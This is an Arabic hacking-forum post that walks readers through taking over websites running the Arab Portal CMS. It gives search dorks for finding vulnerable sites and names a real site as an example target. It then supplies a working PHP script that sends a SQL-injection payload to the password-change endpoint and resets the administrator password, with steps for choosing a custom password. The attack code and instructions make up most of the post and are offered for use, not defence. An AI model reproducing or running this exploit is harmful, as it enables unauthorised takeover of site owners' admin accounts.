1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : Black-Heart | المشاهدات : 1,021 | الردود : 14
حالة الموضوع:
مغلق
  1. Black-Heart V • I • P

    الأنتساب:
    ‏24 مارس 2014
    المشاركات:
    102
    الإعجابات المتلقاة:
    1,987
    نقاط الجائزة:
    215
    الجنس:
    ذكر
    الإقامة:
    أطهر البقاع
    نظام التشغيل:
    Linux
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    PHP
    YouTube:
    [​IMG]

    كيفكم يا حلوين ان شاء الله بخير

    اطرح لكم ثغرة في سكربت البوابة العربية | Arab Portal

    حبيت انزل لكم استغلال الثغرة مع شويت شرح اتمنى ما أطول عليكم ^_^


    اخليكم مع الشرح :


    [​IMG]

    الدوركات :

    بإستخدام برنامج البوابة العربية 2.2

    بإستخدام برنامج البوابة العربية 3.0

    بإستخدام برنامج البوابة العربية 3.0 copyright©2012 all rights reserved

    موقع كمثال :-

    http://alzaidichair.com/

    نروح نبحث عن اليوزر رقم واحد ( 1 ) في الموقع فيه طريقتين للبحث .

    الطريقة الاولى :

    أنك في الصفحة الرئيسية تحصل مقالات او تدوينات شوف الكاتب

    ضع المؤشر على اسمه راح يظهر لك الرابط بالاسفل تشوف رقم اليوزر بالاخير

    مثل الصورة التالية : -

    [​IMG]


    [​IMG]

    [​IMG]

    [​IMG]

    الطريقة الثانية :-

    انسخ مكان الوصلة للاسم والصقه في مفكرة او تبويب جديد في المتصفح وشوف رقم اليوزر

    كالتالي : -

    [FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][IMG]http://cdn.top4top.net/i_01a18bca411.png[/IMG]
    [/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT]

    [FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][IMG]http://www.iq-team.org/elan/fol3.png[/IMG]

    [IMG]http://cdn.top4top.net/i_01a18bca412.png[/IMG]
    [/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT]

    [FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][IMG]http://www.iq-team.org/elan/fol3.png[/IMG]

    [IMG]http://cdn.top4top.net/i_01a18bca413.png[/IMG]
    [/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT]

    [FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][IMG]http://www.iq-team.org/elan/fol3.png[/IMG]


    [/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT]
    الان ننتقل الى طريقة الاستغلال > طبعا طريقة الاستغلال راح تكون عن طريق

    سكربت خارج الموقع ^^ عن الطريق السيرفر الشخصي , صورة للسكربت :-


    [​IMG]

    [FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][IMG]http://www.iq-team.org/elan/fol3.png[/IMG]

    الان خلنا نشرح :-

    أول شيء تثبت برنامج السيرفر الشخصي اللي مو مثبت عنده هذا شرح التثبيت :-

    [URL]http://www.iq-team.org/vb/t30171.html[/URL]

    تروح على المتصفح وتكتب localhost/filename.php

    بدل [ filname.php ] تكتب اسم السكربت اللي اساسا راح يكون ArabPortal.php

    اذا ماغيرته يعني تدخل

    [URL]http://localhost/ArabPortal.php[/URL]

    طبعا الدوركات فوق تروح تستخدم أحد الدوركات وتاخذ احد المواقع المصابة

    وتحط رابط الموقع في الفراغ الموضح Site :

    وتظغط على Change Password

    الباسورد اللي راح يصير بعد ما تظغطه

    admin

    اللي حاب يغير الباسورد تعالو نشرح كيف

    هذا كود السكربت :-

    [PHP CODE]<Script Language='Javascript'>
    document.write(unescape('%0A%3C%68%65%61%64%3E%0A%3C%6D%65%74%61%20%68%74%74%70%2D%65%71%75%69%76%3D%22%43%6F%6E%74%65%6E%74%2D%54%79%70%65%22%20%63%6F%6E%74%65%6E%74%3D%22%74%65%78%74%2F%68%74%6D%6C%3B%20%63%68%61%72%73%65%74%3D%77%69%6E%64%6F%77%73%2D%31%32%35%36%22%20%2F%3E%0A%3C%74%69%74%6C%65%3E%41%72%61%62%50%6F%72%74%61%6C%20%52%65%73%65%74%20%41%64%6D%69%6E%20%50%61%73%73%77%6F%72%64%20%42%79%20%57%6C%64%41%6D%65%52%3C%2F%74%69%74%6C%65%3E%0A%3C%6D%65%74%61%20%6E%61%6D%65%3D%22%64%65%73%63%72%69%70%74%69%6F%6E%22%20%63%6F%6E%74%65%6E%74%3D%22%41%72%61%62%50%6F%72%74%61%6C%20%52%65%73%65%74%20%41%64%6D%69%6E%20%50%61%73%73%77%6F%72%64%20%42%79%20%57%6C%64%41%6D%65%52%22%3E%0A%3C%2F%68%65%61%64%3E%0A%0A%3C%62%6F%64%79%20%62%67%63%6F%6C%6F%72%3D%22%23%30%30%30%30%30%30%22%3E%0A%0A%3C%68%33%20%61%6C%69%67%6E%3D%22%63%65%6E%74%65%72%22%3E%20%0A%3C%69%6D%67%20%63%6C%61%73%73%3D%22%64%65%63%6F%64%65%64%22%20%61%6C%74%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%69%71%2D%74%65%61%6D%2E%6F%72%67%2F%65%6C%61%6E%2F%69%71%32%33%34%2E%70%6E%67%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%69%71%2D%74%65%61%6D%2E%6F%72%67%2F%65%6C%61%6E%2F%69%71%32%33%34%2E%70%6E%67%22%3E%3C%2F%68%33%3E%0A%3C%68%33%20%61%6C%69%67%6E%3D%22%63%65%6E%74%65%72%22%3E%20%3C%66%6F%6E%74%20%66%61%63%65%3D%22%43%6F%6D%69%63%20%53%61%6E%73%20%4D%53%22%20%63%6F%6C%6F%72%3D%22%23%46%46%30%30%30%30%22%3E%41%72%61%62%50%6F%72%74%61%6C%20%52%65%73%65%74%20%41%64%6D%69%6E%20%50%61%73%73%77%6F%72%64%20%0A%42%79%20%57%6C%64%41%6D%65%52%3C%2F%66%6F%6E%74%3E%3C%2F%68%33%3E%0A%3C%70%20%61%6C%69%67%6E%3D%22%63%65%6E%74%65%72%22%3E%20%26%6E%62%73%70%3B%3C%2F%70%3E%0A%3C%66%6F%72%6D%20%6D%65%74%68%6F%64%3D%22%50%4F%53%54%22%3E%0A%3C%70%20%61%6C%69%67%6E%3D%22%63%65%6E%74%65%72%22%3E%3C%62%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%30%30%46%46%30%30%22%20%66%61%63%65%3D%22%43%6F%6D%69%63%20%53%61%6E%73%20%4D%53%22%3E%53%69%74%65%20%3A%3C%2F%66%6F%6E%74%3E%3C%2F%62%3E%20%0A%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%74%65%78%74%22%20%6E%61%6D%65%3D%22%75%72%6C%22%20%70%6C%61%63%65%68%6F%6C%64%65%72%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%73%69%74%65%2E%63%6F%6D%2F%70%6F%72%74%61%6C%2F%22%20%73%69%7A%65%3D%34%30%20%73%74%79%6C%65%3D%22%66%6F%6E%74%2D%73%69%7A%65%3A%20%31%33%70%78%3B%20%63%6F%6C%6F%72%3A%20%23%46%46%30%30%30%30%3B%20%66%6F%6E%74%2D%66%61%6D%69%6C%79%3A%20%43%6F%6D%69%63%20%53%61%6E%73%20%4D%53%3B%20%66%6F%6E%74%2D%77%65%69%67%68%74%3A%20%62%6F%6C%64%3B%20%62%6F%72%64%65%72%3A%20%33%70%78%20%64%6F%75%62%6C%65%20%23%46%46%30%30%30%30%3B%20%70%61%64%64%69%6E%67%2D%6C%65%66%74%3A%20%34%70%78%3B%20%70%61%64%64%69%6E%67%2D%72%69%67%68%74%3A%20%34%70%78%3B%20%70%61%64%64%69%6E%67%2D%74%6F%70%3A%20%31%70%78%3B%20%70%61%64%64%69%6E%67%2D%62%6F%74%74%6F%6D%3A%20%31%70%78%22%20%2F%3E%26%6E%62%73%70%3B%0A%3C%69%6E%70%75%74%20%74%79%70%65%3D%22%73%75%62%6D%69%74%22%20%6E%61%6D%65%3D%22%61%64%64%22%20%76%61%6C%75%65%3D%22%43%68%61%6E%67%65%20%50%61%73%73%77%6F%72%64%22%20%73%74%79%6C%65%3D%22%66%6F%6E%74%2D%66%61%6D%69%6C%79%3A%20%43%6F%6D%69%63%20%53%61%6E%73%20%4D%53%3B%20%66%6F%6E%74%2D%73%69%7A%65%3A%20%31%33%70%78%3B%20%63%6F%6C%6F%72%3A%20%23%30%30%30%30%30%30%3B%20%66%6F%6E%74%2D%77%65%69%67%68%74%3A%20%62%6F%6C%64%3B%20%62%6F%72%64%65%72%3A%20%32%70%78%20%64%61%73%68%65%64%20%23%30%30%46%46%30%30%3B%20%70%61%64%64%69%6E%67%2D%6C%65%66%74%3A%20%34%70%78%3B%20%70%61%64%64%69%6E%67%2D%72%69%67%68%74%3A%20%34%70%78%3B%20%70%61%64%64%69%6E%67%2D%74%6F%70%3A%20%31%70%78%3B%20%70%61%64%64%69%6E%67%2D%62%6F%74%74%6F%6D%3A%20%31%70%78%22%20%2F%3E%3C%2F%70%3E%0A%3C%2F%66%6F%72%6D%3E%0A%3C%70%20%61%6C%69%67%6E%3D%22%63%65%6E%74%65%72%22%3E%26%6E%62%73%70%3B%3C%2F%70%3E%0A%3C%70%20%61%6C%69%67%6E%3D%22%63%65%6E%74%65%72%22%3E%3C%62%3E%3C%66%6F%6E%74%20%66%61%63%65%3D%22%43%6F%6D%69%63%20%53%61%6E%73%20%4D%53%22%20%73%69%7A%65%3D%22%34%22%20%63%6F%6C%6F%72%3D%22%23%33%33%39%39%46%46%22%3E%53%6B%79%70%65%20%3A%3C%2F%66%6F%6E%74%3E%3C%66%6F%6E%74%20%66%61%63%65%3D%22%43%6F%6D%69%63%20%53%61%6E%73%20%4D%53%22%20%73%69%7A%65%3D%22%34%22%20%63%6F%6C%6F%72%3D%22%23%43%43%43%43%43%43%22%3E%20%0A%6C%69%76%65%3A%77%6C%64%61%6D%65%72%3C%2F%66%6F%6E%74%3E%3C%2F%62%3E%3C%2F%70%3E%0A%3C%70%20%61%6C%69%67%6E%3D%22%63%65%6E%74%65%72%22%3E%3C%62%3E%3C%66%6F%6E%74%20%66%61%63%65%3D%22%43%6F%6D%69%63%20%53%61%6E%73%20%4D%53%22%20%73%69%7A%65%3D%22%34%22%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%46%46%30%30%46%46%22%3E%0A%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%6C%64%61%6D%65%72%2E%63%6F%6D%2F%22%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%46%46%30%30%46%46%22%3E%0A%3C%73%70%61%6E%20%73%74%79%6C%65%3D%22%74%65%78%74%2D%64%65%63%6F%72%61%74%69%6F%6E%3A%20%6E%6F%6E%65%22%3E%57%65%62%3C%2F%73%70%61%6E%3E%3C%2F%66%6F%6E%74%3E%3C%2F%61%3E%3C%2F%66%6F%6E%74%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%6C%64%61%6D%65%72%2E%63%6F%6D%2F%22%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%46%46%46%46%46%46%22%3E%3C%73%70%61%6E%20%73%74%79%6C%65%3D%22%74%65%78%74%2D%64%65%63%6F%72%61%74%69%6F%6E%3A%20%6E%6F%6E%65%22%3E%53%69%74%65%3C%2F%73%70%61%6E%3E%3C%2F%66%6F%6E%74%3E%3C%2F%61%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%39%39%39%39%39%39%22%3E%20%0A%7E%20%3C%2F%66%6F%6E%74%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%30%30%36%36%46%46%22%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%74%77%69%74%74%65%72%2E%63%6F%6D%2F%77%6C%64%61%6D%65%72%22%3E%0A%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%30%30%36%36%46%46%22%3E%3C%73%70%61%6E%20%73%74%79%6C%65%3D%22%74%65%78%74%2D%64%65%63%6F%72%61%74%69%6F%6E%3A%20%6E%6F%6E%65%22%3E%54%77%69%74%74%65%72%3C%2F%73%70%61%6E%3E%3C%2F%66%6F%6E%74%3E%3C%2F%61%3E%3C%2F%66%6F%6E%74%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%39%39%39%39%39%39%22%3E%20%0A%7E%20%3C%2F%66%6F%6E%74%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%30%30%39%39%30%30%22%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%61%73%6B%2E%66%6D%2F%77%6C%64%61%6D%65%72%22%3E%0A%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%30%30%39%39%30%30%22%3E%3C%73%70%61%6E%20%73%74%79%6C%65%3D%22%74%65%78%74%2D%64%65%63%6F%72%61%74%69%6F%6E%3A%20%6E%6F%6E%65%22%3E%41%73%6B%3C%2F%73%70%61%6E%3E%3C%2F%66%6F%6E%74%3E%3C%2F%61%3E%3C%2F%66%6F%6E%74%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%39%39%39%39%39%39%22%3E%20%0A%7E%20%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%6C%64%61%6D%65%72%2E%74%75%6D%62%6C%72%2E%63%6F%6D%2F%22%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%39%39%39%39%39%39%22%3E%0A%3C%73%70%61%6E%20%73%74%79%6C%65%3D%22%74%65%78%74%2D%64%65%63%6F%72%61%74%69%6F%6E%3A%20%6E%6F%6E%65%22%3E%54%75%6D%62%6C%72%3C%2F%73%70%61%6E%3E%3C%2F%66%6F%6E%74%3E%3C%2F%61%3E%20%7E%20%3C%2F%66%6F%6E%74%3E%0A%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%33%33%36%36%39%39%22%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%69%6E%73%74%61%67%72%61%6D%2E%63%6F%6D%2F%77%6C%64%61%6D%65%72%22%3E%0A%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%33%33%36%36%39%39%22%3E%3C%73%70%61%6E%20%73%74%79%6C%65%3D%22%74%65%78%74%2D%64%65%63%6F%72%61%74%69%6F%6E%3A%20%6E%6F%6E%65%22%3E%49%6E%73%74%61%67%72%61%6D%3C%2F%73%70%61%6E%3E%3C%2F%66%6F%6E%74%3E%3C%2F%61%3E%3C%2F%66%6F%6E%74%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%39%39%39%39%39%39%22%3E%20%0A%7E%20%3C%2F%66%6F%6E%74%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%79%6F%75%74%75%62%65%2E%63%6F%6D%2F%75%73%65%72%2F%44%6F%64%69%48%61%63%6B%65%72%22%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%46%46%30%30%30%30%22%3E%0A%3C%73%70%61%6E%20%73%74%79%6C%65%3D%22%74%65%78%74%2D%64%65%63%6F%72%61%74%69%6F%6E%3A%20%6E%6F%6E%65%22%3E%59%6F%75%3C%2F%73%70%61%6E%3E%3C%2F%66%6F%6E%74%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%46%46%46%46%46%46%22%3E%3C%73%70%61%6E%20%73%74%79%6C%65%3D%22%74%65%78%74%2D%64%65%63%6F%72%61%74%69%6F%6E%3A%20%6E%6F%6E%65%22%3E%54%75%62%65%3C%2F%73%70%61%6E%3E%3C%2F%66%6F%6E%74%3E%3C%2F%61%3E%3C%2F%66%6F%6E%74%3E%3C%2F%62%3E%3C%2F%70%3E%0A%3C%70%20%61%6C%69%67%6E%3D%22%63%65%6E%74%65%72%22%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%33%33%36%36%39%39%22%20%66%61%63%65%3D%22%43%6F%6D%69%63%20%53%61%6E%73%20%4D%53%22%3E%26%6E%62%73%70%3B%0A%50%6F%77%65%72%65%64%20%42%79%20%3C%2F%66%6F%6E%74%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%6C%64%61%6D%65%72%2E%63%6F%6D%2F%22%20%73%74%79%6C%65%3D%22%74%65%78%74%2D%64%65%63%6F%72%61%74%69%6F%6E%3A%20%6E%6F%6E%65%22%3E%0A%3C%66%6F%6E%74%20%66%61%63%65%3D%22%43%6F%6D%69%63%20%53%61%6E%73%20%4D%53%22%20%63%6F%6C%6F%72%3D%22%23%46%46%46%46%46%46%22%3E%57%6C%64%41%6D%65%52%3C%2F%66%6F%6E%74%3E%3C%2F%61%3E%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%33%33%36%36%39%39%22%20%66%61%63%65%3D%22%43%6F%6D%69%63%20%53%61%6E%73%20%4D%53%22%3E%2E%20%43%6F%70%79%72%69%67%68%74%20%A9%20%0A%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%69%71%2D%74%65%61%6D%2E%6F%72%67%2F%22%20%73%74%79%6C%65%3D%22%74%65%78%74%2D%64%65%63%6F%72%61%74%69%6F%6E%3A%20%6E%6F%6E%65%22%3E%0A%3C%66%6F%6E%74%20%63%6F%6C%6F%72%3D%22%23%46%46%46%46%46%46%22%3E%49%51%2D%54%65%61%4D%3C%2F%66%6F%6E%74%3E%3C%2F%61%3E%20%49%6E%63%2E%20%28%63%29%20%32%30%31%31%2D%32%30%31%34%20%3C%2F%66%6F%6E%74%3E%0A%3C%2F%70%3E%0A'));
    </Script>

    <?php
    ob_start();
    set_time_limit(0);
    if($_POST['add']){
    echo "<hr>";
    ob_flush();
    flush();
    x0b(trim($_POST['url'])."/members.php?action=uppass","action=uppass&code=1' /*!12345OR*/ 1 = '1&myuserid=1' /*!12345OR*/ useradmin = '1&mynewpass=admin&mynewpass2=admin");
    }
    function x0b($x0b,$x0c){
    $x0d=curl_init();
    curl_setopt($x0d, CURLOPT_URL,$x0b);
    curl_setopt($x0d, CURLOPT_COOKIESESSION, TRUE);
    curl_setopt($x0d, CURLOPT_COOKIEJAR,dirname(__FILE__)."/co.txt");
    curl_setopt($x0d, CURLOPT_COOKIEFILE,dirname(__FILE__)."/co.txt");
    curl_setopt($x0d, CURLOPT_POST, 1);
    curl_setopt($x0d, CURLOPT_POSTFIELDS,$x0c);
    curl_setopt($x0d, CURLOPT_FOLLOWLOCATION,0);
    curl_setopt($x0d, CURLOPT_RETURNTRANSFER,1);
    curl_setopt($x0d, CURLOPT_SSL_VERIFYPEER,0);
    $x0e=curl_exec($x0d);
    curl_close($x0d);
    if(file_exists(dirname(__FILE__)."/co.txt")) unlink(dirname(__FILE__)."/co.txt");
    echo $x0e;
    }
    ?>[/PHP CODE]

    راح تلاحظ في السطر رقم 12

    [PHP CODE] x0b(trim($_POST['url'])."/members.php?action=uppass","action=uppass&code=1' /*!12345OR*/ 1 = '1&myuserid=1' /*!12345OR*/ useradmin = '1&mynewpass=admin&mynewpass2=admin");
    [/PHP CODE]

    تشوف

    [PHP CODE]1&mynewpass=admin&mynewpass2=admin[/PHP CODE]
    [/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT]
    [FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange]
    تغير admin الى الباس اللي تبيه مثلا ابي الباس يكون Black-Heart يصير الكود

    [PHP CODE]1&mynewpass=Black-Heart&mynewpass2=Black-Heart[/PHP CODE]

    [/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT]

    [B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][IMG]http://www.iq-team.org/elan/daon2.gif[/IMG]
    أما الان ننتقل الى تحميل السكربت : -[/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/SIZE][/FONT][/B][/COLOR][/COLOR][/B][/FONT][/SIZE][/COLOR][/SIZE][/FONT][/B][/SIZE][/FONT][/B]

    [FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][B][FONT=Arial][SIZE=3][COLOR=Black][SIZE=2][FONT=Tahoma][B][COLOR=DimGray][COLOR=DarkOrange]
